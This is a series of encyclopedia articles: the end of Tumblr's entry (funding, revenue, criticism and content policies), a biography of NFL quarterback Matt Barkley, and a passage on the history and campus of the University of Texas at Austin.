support office in Richmond, Virginia. As of June 1, 2017, Tumblr had 411 employees. The company's logo is set in Bookman Old Style with some modifications. Funding Tumblr had received about $125 million of funding from investors. The company has raised funding from Union Square Ventures, Spark Capital, Martín Varsavsky, John Borthwick (Betaworks), Fred Seibert, Krum Capital, and Sequoia Capital (among other investors). In its first round of funding in October 2007, Tumblr raised $750,000 from Spark Capital and Union Square Ventures. In December 2008 the company raised $4.5 million in Series B funding and a further $5 million in April 2010. In December 2010 Tumblr raised $30 million in Series D funding. The company had an $800 million valuation in August 2011. In September 2011 the company raised $85 million in a round of funding led by Greylock Partners and Insight Venture Partners. Revenue sources In an interview with Nicole Lapin of Bloomberg West on September 7, 2012, David Karp said the site was monetized by advertising. Its first advertising launch started in May 2012 after 16 experimental campaigns. Tumblr made $13 million in revenue in 2012 and hoped to make $100 million in 2013. Tumblr reportedly spent $25 million to fund operations in 2012. In 2013, Tumblr began allowing companies to pay to promote their own posts to a larger audience. Tumblr's Head of Sales, Lee Brown, has quoted the average ad purchase on Tumblr to be nearly six figures. Tumblr also allows premium theme templates to be sold for use by blogs. In July 2016, advertisements were implemented by default across all blogs. Users may opt out, and the service stated that a revenue sharing program would be implemented at a later date. In February 2022, Tumblr launched an ad-free subscription option that removes the marketing from microblogs for $5 per month, or $40 per year. 
Criticism Copyright issues Tumblr has received criticism for copyright violations by participating bloggers; however, Tumblr accepts Digital Millennium Copyright Act (DMCA) take-down notices. Tumblr's visual appeal has made it ideal for photoblogs that often include copyrighted works from others that are re-published without payment. Tumblr users can post unoriginal content by "Reblogging", a feature on Tumblr that allows users to re-post content taken from another blog onto their own blog with attribution. Security Tumblr has been forced to manage spam and security problems. For example, a chain letter scam in May 2011 affected 130,000 users. On December 3, 2012, Tumblr was attacked by a cross-site scripting worm deployed by the Internet troll group Gay Nigger Association of America. The message urged users to harm themselves and criticized blogging in general. User interface changes In 2015, Tumblr faced criticism by users for changes to its reblog mechanisms. In July 2015, the system was modified so that users cannot remove or edit individual comments by other users when reblogging a post; existing comments can only be removed all at once. Tumblr staff argued that the change was intended to combat "misattribution", though this move was met by criticism from ‘ask blogs’ and ‘RP blogs’, which often shortened long chains of reblogs between users to improve readability. In September 2015, Tumblr changed how threads of comments on reblogged posts are displayed; rather than a nested view with indentations for each post, all reblogs are now shown in a flat view, and user avatars were also added. The change was intended to improve the legibility of reblogs, especially on mobile platforms, and complements the inability to edit existing comments. Although some users had requested such a change to combat posts made illegible by extremely large numbers of comments on a reblogged post, the majority of users (even those who had requested such a change) criticized the new format. The Verge was also critical of the changes, noting that the new look was cleaner but made the site lose its "nostalgic charm". Userbase behaviour While Tumblr's userbase has generally been received as accommodating people from a wide range of ideologies and identities, a common point of criticism is that attitudes from users on the site stifle discussion and discourse. In 2015, members of the Steven Universe fandom drove an artist to the point of attempting suicide over fan artwork in which the artist drew characters, typically depicted as fat in the show, as thin. In 2018, Kotaku reporter Gita Jackson described the site as a 'joyless black hole', citing how the website's design and functionality led to 'fandoms spinning out of control', as well as an environment which inhibited discussion and discourse. Promotion of self-harm and suicide In February 2012, Tumblr banned blogs that promote or advocate suicide, self-harm and eating disorders (pro-ana). The suicide of a British teenager, Tallulah Wilson, raised the issue of suicide and self-harm promotion on Tumblr, as Wilson was reported to have maintained a self-harm blog on the site. A user on the site is reported to have sent Wilson an image of a noose accompanied by the message: "here is your new necklace, try it on." In response to the Wilson case, Maria Miller, the UK's minister for culture, media, and sport, said that social media sites like Tumblr need to remove "toxic" self-harm content. 
Searching terms like "depression", "anxiety", and "suicide" on Tumblr now brings up a PSA page directing the user to resources such as the national suicide lifeline and 7 Cups, as well as an option to continue to the search results. There are concerns that some Tumblr posts glorify suicide and depression among young people. Politics In February 2018, BuzzFeed published a report claiming that Tumblr was utilized as a distribution channel for Russian agents to influence American voting habits during the 2016 presidential election. Despite policies forbidding hate speech, Tumblr has been noted for hosting content from Nazis and white supremacists. In May 2020, Tumblr announced that it would remove reblogs of terminated hate speech posts, specifically Nazi and white supremacist content. Censorship Several countries have blocked access to Tumblr because of pornography, religious extremism or LGBT content. These countries include China, Indonesia, Kazakhstan and Iran. In February 2016, the Indonesian government temporarily blocked access to Tumblr within the country because the site hosted pages that carried pornography. The government soon reversed its decision to block the site and said it had asked Tumblr to self-censor its pornographic content. Adult content ban In November 2018, Tumblr's iOS app was removed by Apple from its App Store after child pornography was found on the service. Tumblr stated that all images uploaded to the service are scanned against an industry database, but that a "routine audit" had revealed images that had not yet been added to the database. In the wake of the incident, a number of Tumblr blogs—particularly those dealing primarily in adult-tagged artwork such as erotica, as well as art study and anatomy resources—were also deleted, with affected users taking to other platforms (such as Twitter) to warn others and complain about the deletions, as well as encourage users to back up their blog's contents. Tumblr subsequently removed the ability to disable "Safe Mode" from its Android app, and announced a wider ban on explicit images of sex acts and nudity on the platform, with certain limited exceptions. Tumblr deployed an automatic content recognition system, which resulted in many non-pornographic images being removed from the platform. In December 2018, about a month after it was initially banned, Tumblr's iOS app was restored to the App Store. The site had been known for hosting adult content that attracted women and catered to other under-served audiences. Notable users Celebrities who have used Tumblr include Taylor Swift, Lady Gaga, Ariana Grande, Zooey Deschanel, John Mayer, B.o.B, Soulja Boy, Fergie, Anthony Bourdain, John Green, Zayn, Lana Del Rey, Grimes, Hayley Williams, Frank Ocean, Lorde, Sufjan Stevens, Jhené Aiko, Amandla Stenberg, Karlie Kloss, Dianna Agron, and Camila Cabello. On October 21, 2011, then-U.S. President Barack Obama created a Tumblr. See also Comparison of microblogging services Comparison of free blog hosting services List of social networking websites Tech companies in the New York metropolitan area References External links 2007 establishments in New York City 2013 mergers and acquisitions 2019 mergers and acquisitions Automattic Blog hosting services Companies based in Manhattan Internet properties established in 2007 Microblogging software Microblogging services Social media Software companies based in New York City Software companies of the United States Webby Award winners WordPress
14775644
https://en.wikipedia.org/wiki/Matt%20Barkley
Matt Barkley
Matthew Montgomery Barkley (born September 8, 1990) is an American football quarterback who is a free agent. He played college football at Southern California, and was drafted by the Philadelphia Eagles in the fourth round of the 2013 NFL Draft. He has also played for the Chicago Bears, Arizona Cardinals, San Francisco 49ers, Cincinnati Bengals, Buffalo Bills, Tennessee Titans, and Carolina Panthers. Early years Barkley was born in Newport Beach, California, and attended Mater Dei High School in Santa Ana. In 2005, he became the first freshman quarterback to start at Mater Dei since Todd Marinovich. As a freshman, he passed for 1,685 yards and 10 touchdowns, but suffered a season-ending injury (broken collarbone) during the playoffs in a quarterfinal win over Colton High School. The injury was caused by future University of Southern California (USC) teammate, running back Allen Bradford, who played linebacker in high school. Barkley's high school coach, Bruce Rollinson, permitted him to call his own plays, something he had never allowed a player to do during two decades at Mater Dei. As a sophomore, he passed for 1,349 yards and 11 touchdowns in 2006. Barkley passed for 3,576 yards and 35 touchdowns in 2007, completing 63 percent of his passes with nine interceptions. In three seasons, he passed for 6,994 yards and 57 touchdowns. Barkley was named 2007 football Gatorade National Player of the Year, and then the 2007 Gatorade national male athlete of the year, becoming the first non-senior to win both awards. Barkley also won the 2007 Glenn Davis Award, given to the best high school football player in Southern California, and the inaugural Joe Montana Award as the nation's top high school quarterback. Barkley was rated as the top prospect in the nation for the Class of 2009 by ESPN. He was rated the top prospect by Rivals.com. Quarterback coach Steve Clarkson described Barkley as a cross between Joe Montana and Tom Brady. As a top high school player, Barkley was heavily recruited. On January 23, 2008, Barkley verbally committed to USC, ending speculation that he might join UCLA, which had just hired coaches Rick Neuheisel and Norm Chow. Barkley's father, Les Barkley, was an All-American water polo player at USC from 1976 to 1979. He made his decision more than a year before his National Signing Day, telling his family and coaches and then calling USC coach Pete Carroll on his cell phone. The previous quarterback to go to USC from Mater Dei was Heisman Trophy-winner Matt Leinart (the school had also graduated fellow Heisman winner John Huarte). After committing to USC, Barkley began recruiting other elite high school players to join him. His 2008 senior season started slow, with Barkley throwing nearly as many interceptions as touchdown passes and the Monarchs barely keeping above .500; however, his performance turned around and Mater Dei rallied to 7–3 and entered the playoffs. The Monarchs made it to the quarterfinal, falling to Tesoro High School and ending the season 8–4. Barkley finished his Mater Dei High School career as the all-time passing yardage leader in Orange County, surpassing the record set by Todd Marinovich in 1987. He graduated from high school on December 18, 2008. On January 4, 2009, Barkley participated in Under Armour All-America Game at the Florida Citrus Bowl. After a strong performance, where he completed 11-of-22 passes for 237 yards and two touchdowns and led the White team to a 27–16 victory over the Black team, he was named the game's co-MVP. 
Soon afterward, he was moved back up to number one among high school prospects in America by ESPN, having dropped to tenth during his senior season. College career After graduating from high school a semester early, Barkley enrolled in the University of Southern California in January 2009 so he could participate in spring practice with the USC Trojans football team. He would play for the Trojans for the next four seasons, from 2009 to 2012. 2009 With the early departure of the Trojans' previous starting quarterback, Mark Sanchez, for the NFL, and with no clear successor, a three-way quarterback battle emerged during spring practices between Barkley and quarterbacks Aaron Corp and Mitch Mustain, both of whom had held the second quarterback spot at various times during the previous season; the latter had been the starting quarterback at Arkansas for eight games in 2006. Barkley adapted to the Trojans offense and gave strong performances during spring practices, trying for and making big plays but also throwing several key interceptions. Impressing his coaches, Barkley climbed to the number two spot at the end of spring behind Corp. Afterward, ESPN NFL Draft analyst Mel Kiper Jr. stated he believed that in "three years Matt Barkley—who will be a true freshman this year—will be the No. 1 pick in the draft." On August 27, during fall practices, Carroll named Barkley the starter for the 2009 season opener against San Jose State. Barkley became the first true freshman quarterback ever to start a season opener for the Trojans, and the first true freshman to start the opener for a preseason top-five team since Rick Leach did it for #3 Michigan in 1975. After a slow first quarter, Barkley finished his college debut with 233 yards, going 15-for-19 with one touchdown in a 56–3 victory. Barkley's second game brought his first major test and first road game, against the highly ranked Ohio State Buckeyes. Before a sold-out, raucous crowd at Ohio Stadium, Barkley led a game-winning, 86-yard drive late in the fourth quarter, earning significant praise from the sports media. Barkley suffered a shoulder bruise in the Ohio State game, and had to sit out the following week's game at Washington. With Aaron Corp at the helm, the Trojans struggled in a major upset loss, falling to the unranked Huskies 16–13 while putting up the lowest number of passing yards for a USC team since Carroll took over the program in 2001. Carroll had Barkley, who was not fully recovered from his injury, start the next game against Washington State. Barkley contributed to a 27–6 victory, passing for 247 yards and two touchdowns. He followed this up with 282 passing yards in a 30–3 win over California on October 3. The next week against Notre Dame, he was 19 for 29 with two touchdowns. He followed that up with a 15-of-25, two-touchdown game against Oregon State. Against Stanford he threw three interceptions and only one touchdown. Two weeks later he threw one touchdown and one interception in a 28–7 victory over UCLA. The following week, he again threw one touchdown and one interception, this time in a 21–17 loss to Arizona. He closed his freshman season by throwing for 350 yards and two touchdowns against Boston College in the 2009 Emerald Bowl. 2010 On September 2, 2010, Barkley led the Trojans to an opening week victory at Hawaii by a score of 49–36. Barkley contributed five passing touchdowns (three to wide receiver Ronald Johnson) on 17-of-23 passing for 257 yards. The win marked a successful debut for new USC head coach Lane Kiffin and the first win under USC's 2010 NCAA probation and sanctions. 
Both teams amassed over 500 yards of total offense. Barkley said, "I'm just trying to be as perfect as I can be. Last week was pretty close, but that perfect game is kind of a goal and that's no incompletions." Coach Kiffin added, "We'll see if he can continue to do it again. Great quarterbacks put together good games every week." Barkley continued a solid sophomore campaign, with notable performances against Stanford and Cal. Barkley sprained his ankle during a loss to Oregon State and was forced to the sideline for the Notre Dame game. He returned to lead the Trojans to a gutsy 28–14 victory over UCLA. 2011 Barkley began 2011 by setting the USC single-game record for completions with 34 against Minnesota. On October 1, against Arizona, he passed for a USC single-game record 468 yards. On November 4, he set a USC single-game record with six touchdown passes against the Colorado Buffaloes, one of the two additions to the Pac-12 in its inaugural season; the game was the first against Colorado since 2002. He had previously tied the single-game touchdown record three times, sharing it with Rodney Peete, Carson Palmer, Matt Leinart and Mark Sanchez. On November 26, against UCLA, he tied the single-game touchdown record again in a 50–0 shutout of the Bruins. On national television, Barkley stated the best moment of the UCLA game was his pass to his cousin Robbie Boyer. Over the 2011 season, Barkley accumulated 39 touchdowns, an all-time Pac-12 record, and helped the Trojans end the season with a 10–2 record. Barkley finished sixth in Heisman Trophy voting. He finished with a 39–7 touchdown-to-interception ratio while completing 69.1% of his passes. He won the 2011 CFPA National Performer of the Year Trophy with his record-breaking season. On December 22, 2011, at a press conference convened at Heritage Hall, Barkley announced he would return for his senior year with the USC Trojans rather than entering the 2012 NFL Draft. Barkley announced his return by giving Coach Kiffin a homemade Christmas ornament with a picture of the two of them at the Colorado game on the front and the text "One more year" on the back. Barkley described his decision to stay at USC for his senior year as "unfinished business", as he wanted to be part of a team that would be aiming for the BCS championship after a two-year postseason ban. 2012 Going into his senior season, Barkley was widely considered a favorite to win the Heisman Trophy. At the beginning of the season, USC was ranked #1 in the preseason poll, but a 21–14 loss to then-#21 Stanford ended USC's potential BCS national championship run. USC then went on to lose five games that year, including a late-season loss to rival UCLA for the first time in six years. Barkley was knocked out of that game by UCLA's Anthony Barr with a shoulder-separating hit, ending his regular season abruptly. On December 27, 2012, head coach Lane Kiffin announced that Barkley would not play in the Sun Bowl because of his shoulder injury, effectively ending his college football career. Statistics Professional career Despite being projected a first-round selection for the 2012 NFL Draft by midseason of 2011, Barkley decided to return to USC for his senior season. As early as April 2012, he was projected the No. 1 overall pick for the 2013 NFL Draft. However, one month prior to the draft, Barkley's draft stock had fallen, with ESPN draft analysts Mel Kiper Jr. 
and Todd McShay projecting Barkley to fall out of the first round. Due to his shoulder injury, Barkley did not throw in the Indianapolis NFL Scouting Combine and instead took medical tests on his shoulder. Philadelphia Eagles The Philadelphia Eagles selected Barkley in the fourth round with the 98th overall pick of the 2013 NFL Draft. Going into training camp, it was announced that he would be given a chance to compete for the starting quarterback job, facing off against the two starting quarterbacks from the previous season, Nick Foles and Michael Vick. On October 20, 2013, he saw his first NFL action against the Dallas Cowboys as he came in to relieve Nick Foles, who left early in the fourth quarter due to a head injury. In that game, Barkley completed 11 of his 20 pass attempts for 129 yards and threw three interceptions. Barkley's second game came the following week in relief of Foles (concussion) and Vick (quadriceps) on October 27 versus the New York Giants. Barkley completed 17 of 26 passes for 158 yards and one interception to go along with recording one fumble inside their red zone. Arizona Cardinals The Eagles traded Barkley to the Arizona Cardinals for a conditional seventh-round pick in the 2016 NFL Draft on September 4, 2015. The terms said that he needed to be on the roster for 6 games, which were fulfilled on October 17, 2015. On September 3, 2016, Barkley was released by the Cardinals. Chicago Bears Barkley was signed to the Chicago Bears' practice squad on September 4, 2016. He was elevated to the active roster on September 22, 2016. Following an injury to the Bears' backup quarterback Brian Hoyer against the Green Bay Packers on October 20, Barkley made his first appearance as a member of the Chicago Bears, going 6 of 15 for 81 yards; he threw for zero touchdowns and two interceptions. After Jay Cutler suffered a shoulder injury against the Giants, Barkley started the following week's game against the Tennessee Titans. Barkley completed 28 of 54 passes for 316 yards with three touchdowns, two interceptions, and a 72.8 passer rating, nearly rallying the Bears from a 20-point deficit in the fourth quarter before losing 27–21. Barkley earned his first NFL win the very next week on December 4, a 26–6 win over the San Francisco 49ers at Soldier Field. This was the Bears' third and last victory of the season. He completed 11 for 18 passes for 192 yards, no touchdowns, no interceptions, and a 97.5 passer rating. On December 18, Barkley completed 30 passes for 362 yards, two touchdowns and three interceptions as the Bears nearly upset the Green Bay Packers, ultimately losing 30–27 on a last-second field goal. It was the most yards by a Bears quarterback in a game against Green Bay in the rivalry's history. Barkley struggled in the following week's game against the Washington Redskins, a 41–21 loss; although he threw for 323 yards and two touchdown passes, he also threw five interceptions, including on four consecutive drives in the second half. The five interceptions were the most by a Bears quarterback since Cutler threw five in 2009. In Week 17, Barkley caught a touchdown from wide receiver Cameron Meredith on a trick play; while Barkley was calling at the line of scrimmage, the ball was snapped to running back Jeremy Langford, who handed it off to Meredith before throwing it to a wide-open Barkley for the touchdown. He ended the 2016 season with eight touchdown passes and 14 interceptions. 
Of his 216 pass attempts, 89 went for a first down (41.2 percent), the second-highest percentage in the NFL behind the Atlanta Falcons' Matt Ryan (44.6). San Francisco 49ers On March 10, 2017, Barkley signed a two-year contract with the San Francisco 49ers. On September 1, 2017, he was released by the 49ers at the end of the preseason after throwing for just 197 yards with no touchdowns or interceptions. He was beaten out by veteran Brian Hoyer and rookie C. J. Beathard. Arizona Cardinals (second stint) On November 13, 2017, Barkley re-signed with the Cardinals because Drew Stanton was at risk of missing playing time with a knee sprain. However, Barkley was inactive for the entire season. Cincinnati Bengals On March 17, 2018, Barkley signed a two-year contract with the Cincinnati Bengals. He was placed on injured reserve on September 1, 2018, after suffering a knee injury in the preseason. Barkley was released on September 12, 2018, with an injury settlement. Buffalo Bills On October 31, 2018, Barkley was signed by the Buffalo Bills. On November 11, it was announced that he would start for the Bills against the New York Jets over Nathan Peterman with starter Josh Allen injured. Barkley, making his first NFL start in two years, threw for 232 yards and two touchdown passes as Buffalo beat the Jets 41–10, snapping the team's four-game losing streak. On December 21, 2018, Barkley signed a two-year contract extension with the Bills through the 2020 season. In Week 4 of the 2019 season, Barkley came into the game against the New England Patriots to relieve Josh Allen, who had suffered a head injury during the game. He passed for 127 yards and one interception in the 16–10 loss. He made one other appearance in Week 17 against the New York Jets, where he passed for 232 yards and two interceptions in relief of Allen in the 13–6 loss. During the 2020 season, Barkley saw action in five regular season games and threw his first touchdown pass since the 2018 season, a 56-yard completion to wide receiver Gabriel Davis, during the final game of the season against the Miami Dolphins. Barkley finished the regular season completing 11 of 21 passes for 197 yards, one touchdown, and one interception. Tennessee Titans Barkley signed a two-year contract with the Tennessee Titans on August 5, 2021. He was released on September 1, 2021, and re-signed to the practice squad. Carolina Panthers On November 10, 2021, Barkley was signed by the Carolina Panthers off the Titans' practice squad. He was waived on December 28. Atlanta Falcons On December 29, 2021, Barkley was claimed off waivers by the Atlanta Falcons. He was waived on January 4, 2022, and re-signed to the practice squad. His contract expired when the team's season ended on January 9, 2022. NFL career statistics Personal life Barkley's cousin, Robbie Boyer, was a walk-on at USC during Barkley's freshman, sophomore, and junior years. Barkley's younger siblings, twins Sam and Lainy, also attended USC. Barkley is a Christian. During Christmas 2008, Barkley went with a group of friends and family to help run an orphanage in South Africa. For Christmas 2010, he spent his winter break in Nigeria "visiting orphans, widows, villagers and prisoners, doing construction work, distributing supplies and gifts and sharing daily fellowship." In 2012, Barkley led a group of 16 USC football teammates to Haiti, where they built houses and delivered more than 2,000 pounds of supplies for orphanages and schools. 
He appears on I Am Second, sharing the story of his Christian faith and personal relationship with Jesus Christ. At the beginning of his USC career, Barkley befriended former USC Olympian, World War II prisoner of war, and inspirational speaker Louis Zamperini. Barkley married his high school sweetheart, Brittany Langdon, in July 2013, a year after he graduated from USC. In December 2014, she announced via Twitter that she was pregnant. Their son was born in 2015. See also List of Division I FBS passing touchdown leaders References External links Buffalo Bills bio Chicago Bears bio Philadelphia Eagles bio USC Trojans bio 1990 births Christians from California American football quarterbacks Arizona Cardinals players Chicago Bears players Living people Philadelphia Eagles players Players of American football from California Sportspeople from Newport Beach, California Under Armour All-American football players USC Trojans football players San Francisco 49ers players Cincinnati Bengals players Buffalo Bills players Tennessee Titans players Carolina Panthers players Atlanta Falcons players
32031
https://en.wikipedia.org/wiki/University%20of%20Texas%20at%20Austin
University of Texas at Austin
The University of Texas at Austin (UT Austin, UT, or Texas) is a public research university in Austin, Texas, founded in 1883. The University of Texas was included in the Association of American Universities in 1929. The institution enrolls over 50,000 undergraduate and graduate students and employs over 24,000 faculty and staff. It is a major center for academic research, with research expenditures totaling $679.8 million for fiscal year 2018. The university houses seven museums and seventeen libraries, including the LBJ Presidential Library and the Blanton Museum of Art, and operates various auxiliary research facilities, such as the J. J. Pickle Research Campus and the McDonald Observatory. As of November 2020, 13 Nobel Prize winners, four Pulitzer Prize winners, two Turing Award winners, two Fields medalists, two Wolf Prize winners, and two Abel Prize winners have been affiliated with the school as alumni, faculty members or researchers. The university has also been affiliated with three Primetime Emmy Award winners, and as of 2021 its students and alumni have earned a total of 155 Olympic medals. Student-athletes compete as the Texas Longhorns. The Longhorns have won four NCAA Division I National Football Championships, six NCAA Division I National Baseball Championships, and thirteen NCAA Division I National Men's Swimming and Diving Championships, and have claimed more titles in men's and women's sports than any other school in the Big 12. History Establishment The first mention of a public university in Texas can be traced to the 1827 constitution for the Mexican state of Coahuila y Tejas. Although Title 6, Article 217 of the Constitution promised to establish public education in the arts and sciences, no action was taken by the Mexican government. After Texas obtained its independence from Mexico in 1836, the Texas Congress adopted the Constitution of the Republic, which, under Section 5 of its General Provisions, stated "It shall be the duty of Congress, as soon as circumstances will permit, to provide, by law, a general system of education." On April 18, 1838, "An Act to Establish the University of Texas" was referred to a special committee of the Texas Congress, but was not reported back for further action. On January 26, 1839, the Texas Congress agreed to set aside fifty leagues of land toward the establishment of a publicly funded university. In addition, 40 acres in the new capital of Austin were reserved and designated "College Hill". (The term "Forty Acres" is colloquially used to refer to the University as a whole. The original 40 acres is the area from Guadalupe to Speedway and 21st Street to 24th Street.) In 1845, Texas was annexed into the United States. The state's Constitution of 1845 failed to mention higher education. On February 11, 1858, the Seventh Texas Legislature approved O.B. 102, an act to establish the University of Texas, which set aside $100,000 in United States bonds toward construction of the state's first publicly funded university (the $100,000 was an allocation from the $10 million the state received pursuant to the Compromise of 1850 and Texas's relinquishing claims to lands outside its present boundaries). The legislature also designated land reserved for the encouragement of railroad construction toward the university's endowment. 
On January 31, 1860, the state legislature, wanting to avoid raising taxes, passed an act authorizing the money set aside for the University of Texas to be used for frontier defense in west Texas to protect settlers from the alleged attacks of Native peoples. Texas's secession from the Union and the American Civil War delayed repayment of the borrowed monies. At the end of the Civil War in 1865, the University of Texas's endowment was just over $16,000 in warrants, and nothing substantive had been done to organize the university's operations. The effort to establish a university was again mandated by Article 7, Section 10 of the Texas Constitution of 1876, which directed the legislature to "establish, organize and provide for the maintenance, support and direction of a university of the first class, to be located by a vote of the people of this State, and styled 'The University of Texas'." Additionally, Article 7, Section 11 of the 1876 Constitution established the Permanent University Fund, a sovereign wealth fund managed by the Board of Regents of the University of Texas and dedicated to the maintenance of the university. Because some state legislators perceived an extravagance in the construction of academic buildings of other universities, Article 7, Section 14 of the Constitution expressly prohibited the legislature from using the state's general revenue to fund construction of university buildings. Funds for constructing university buildings had to come from the university's endowment or from private gifts to the university, but the university's operating expenses could come from the state's general revenues. The 1876 Constitution also revoked the endowment of the railroad lands of the Act of 1858, but dedicated a grant of land in far west Texas, along with other property appropriated for the university, to the Permanent University Fund. This was greatly to the detriment of the university, as the lands the Constitution of 1876 granted the university represented less than 5% of the value of the lands granted to the university under the Act of 1858 (the lands close to the railroads were quite valuable, while the lands granted the university were in far west Texas, distant from sources of transportation and water). The more valuable lands reverted to the fund to support general education in the state (the Special School Fund). On April 10, 1883, the legislature supplemented the Permanent University Fund with another grant of land in west Texas that had been granted to the Texas and Pacific Railroad but was returned to the state as seemingly too worthless to even survey. The legislature additionally appropriated $256,272.57 to repay the funds taken from the university in 1860 to pay for frontier defense and for transfers to the state's General Fund in 1861 and 1862. The 1883 grant of land increased the land in the Permanent University Fund to almost 2.2 million acres. Under the Act of 1858, the university had been entitled to a grant of land for every mile of railroad built in the state. Had the 1876 Constitution not revoked the original 1858 grant of land, by 1883 the university lands would have totaled 3.2 million acres, so the 1883 grant was to restore lands taken from the university by the 1876 Constitution, not an act of munificence. 
Galveston, having come in second in the election (with 20,741 votes), was designated the location of the medical department (Houston was third with 12,586 votes). On November 17, 1882, on the original "College Hill," an official ceremony commemorated the laying of the cornerstone of the Old Main building. University President Ashbel Smith, presiding over the ceremony, prophetically proclaimed, "Texas holds embedded in its earth rocks and minerals which now lie idle because unknown, resources of incalculable industrial utility, of wealth and power. Smite the earth, smite the rocks with the rod of knowledge and fountains of unstinted wealth will gush forth." The University of Texas officially opened its doors on September 15, 1883. Expansion and growth In 1890, George Washington Brackenridge donated $18,000 for the construction of a three-story brick mess hall known as Brackenridge Hall (affectionately known as "B.Hall"), one of the university's most storied buildings and one that occupied an important place in university life until its demolition in 1952. The old Victorian-Gothic Main Building served as the central point of the campus's site, and was used for nearly all purposes. By the 1930s, however, discussions arose about the need for new library space, and the Main Building was razed in 1934 over the objections of many students and faculty. The modern-day tower and Main Building were constructed in its place. In 1910, George Washington Brackenridge again displayed his philanthropy, this time donating a tract of land on the Colorado River to the university. A vote by the regents to move the campus to the donated land was met with outrage, and the land has only been used for auxiliary purposes such as graduate student housing. Part of the tract was sold in the late 1990s for luxury housing, and there are controversial proposals to sell the remainder of the tract. The Brackenridge Field Laboratory was established on part of the land in 1967. In 1916, Gov. James E. Ferguson became involved in a serious quarrel with the University of Texas. The controversy grew out of the board of regents' refusal to remove certain faculty members whom the governor found objectionable. When Ferguson found he could not have his way, he vetoed practically the entire appropriation for the university. Without sufficient funding, the university would have been forced to close its doors. In the middle of the controversy, Ferguson's critics brought to light a number of irregularities on the part of the governor. Eventually, the Texas House of Representatives prepared 21 charges against Ferguson, and the Senate convicted him on 10 of them, including misapplication of public funds and receiving $156,000 from an unnamed source. The Texas Senate removed Ferguson as governor and declared him ineligible to hold office. 
With sufficient funds to finance construction on both campuses, on April 8, 1931, the Forty-second Legislature passed H.B. 368, which granted the Agricultural and Mechanical College a one-third interest in the Available University Fund, the annual income from Permanent University Fund investments. The University of Texas was inducted into the Association of American Universities in 1929. During World War II, the University of Texas was one of 131 colleges and universities nationally that took part in the V-12 Navy College Training Program, which offered students a path to a Navy commission. In the fall of 1956, the first Black students entered the university's undergraduate class. Black students were permitted to live in campus dorms, but were barred from campus cafeterias. The University of Texas integrated its facilities and desegregated its dormitories in 1965. UT, which had had an open admissions policy, adopted standardized testing for admissions in the mid-1950s, at least in part as a conscious strategy to minimize the number of Black undergraduates, given that it was no longer able to simply bar their entry after the Brown decision. Following growth in enrollment after World War II, the university unveiled an ambitious master plan in 1960 designed for "10 years of growth" that was intended to "boost the University of Texas into the ranks of the top state universities in the nation." In 1965, the Texas Legislature granted the university's Board of Regents the authority to use eminent domain to purchase additional properties surrounding the original Forty Acres. The university began buying parcels of land to the north, south, and east of the existing campus, particularly in the Blackland neighborhood to the east and the Brackenridge tract to the southeast, in hopes of using the land to relocate the university's intramural fields, baseball field, tennis courts, and parking lots. On March 6, 1967, the Sixtieth Texas Legislature changed the university's official name from "The University of Texas" to "The University of Texas at Austin" to reflect the growth of the University of Texas System. 1966 shooting On August 1, 1966, Texas student Charles Whitman barricaded the observation deck in the tower of the Main Building. Armed with multiple firearms, he killed 14 people on campus, 11 from the observation deck and below the clocks on the tower and three more inside the tower, as well as wounding two others inside the observation deck. The massacre ended when Whitman was shot and killed by police after they breached the tower. After the shooting, the observation deck was closed until 1968, and then closed again in 1975 following a series of suicide jumps during the 1970s. In 1999, after installation of security fencing and other safety precautions, the tower observation deck reopened to the public. There is a turtle pond park near the tower dedicated to those affected by the tragedy. Recent history The first presidential library on a university campus was dedicated on May 22, 1971, with former President Johnson, Lady Bird Johnson and then-President Richard Nixon in attendance. Constructed on the eastern side of the main campus, the Lyndon Baines Johnson Library and Museum is one of 13 presidential libraries administered by the National Archives and Records Administration. A statue of Martin Luther King Jr. was unveiled on campus in 1999 and subsequently vandalized. 
By 2004, John Butler, a professor at the McCombs School of Business, had suggested moving it to Morehouse College, a historically black college, "a place where he is loved". The University of Texas at Austin has recently experienced a wave of new construction, adding several significant buildings. On April 30, 2006, the school opened the Blanton Museum of Art. In August 2008, the AT&T Executive Education and Conference Center opened, with the hotel and conference center forming part of a new gateway to the university. Also in 2008, Darrell K Royal-Texas Memorial Stadium was expanded to a seating capacity of 100,119, making it the largest stadium (by capacity) in the state of Texas at the time. On January 19, 2011, the university announced the creation of a 24-hour television network in partnership with ESPN, dubbed the Longhorn Network. ESPN agreed to pay a $300 million guaranteed rights fee over 20 years to the university and to IMG College, the school's multimedia rights partner. The network covers the university's intercollegiate athletics, music, cultural arts, and academics programs. The channel first aired in September 2011. In 2021, UT Austin leaders worked with Dan Patrick, the lieutenant governor of Texas, and private donors to set up a Liberty Institute at the university. In 2022, Patrick said that the Liberty Institute was created to restrict teaching about critical race theory. Patrick's remarks sparked concerns about academic freedom and freedom of thought on campus. Campus The university's property comprises the Main Campus in central Austin, the J. J. Pickle Research Campus in north Austin, and other properties throughout Texas. The main campus has 150 buildings. One of the university's most visible features is the Beaux-Arts Main Building, including a tower designed by Paul Philippe Cret. Completed in 1937, the Main Building is in the middle of campus. The tower usually appears illuminated in white light in the evening but is lit burnt orange for various special occasions, including athletic victories and academic accomplishments; conversely, it is darkened for solemn occasions. At the top of the tower is a carillon of 56 bells, the largest in Texas. Songs are played on weekdays by student carillonneurs, in addition to the usual pealing of Westminster Quarters every quarter-hour between 6 a.m. and 9 p.m. In 1998, after the installation of security and safety measures, the observation deck reopened to the public indefinitely for weekend tours. The university's seven museums and seventeen libraries hold over nine million volumes, making its library system the seventh-largest academic library in the country. The holdings of the university's Harry Ransom Humanities Research Center include one of only 21 remaining complete copies of the Gutenberg Bible and the first permanent photograph, View from the Window at Le Gras, taken by Nicéphore Niépce. The newest museum, the Blanton Museum of Art, is the largest university art museum in the United States and hosts approximately 17,000 works from Europe, the United States, and Latin America. The Perry–Castañeda Library, which houses the central University Libraries operations and the Perry–Castañeda Library Map Collection, is at the heart of campus. The Benson Latin American Collection holds the largest collection of Latin American materials among US university libraries, and maintains substantial digital collections. The University of Texas at Austin has an extensive tunnel system that links the buildings on campus. 
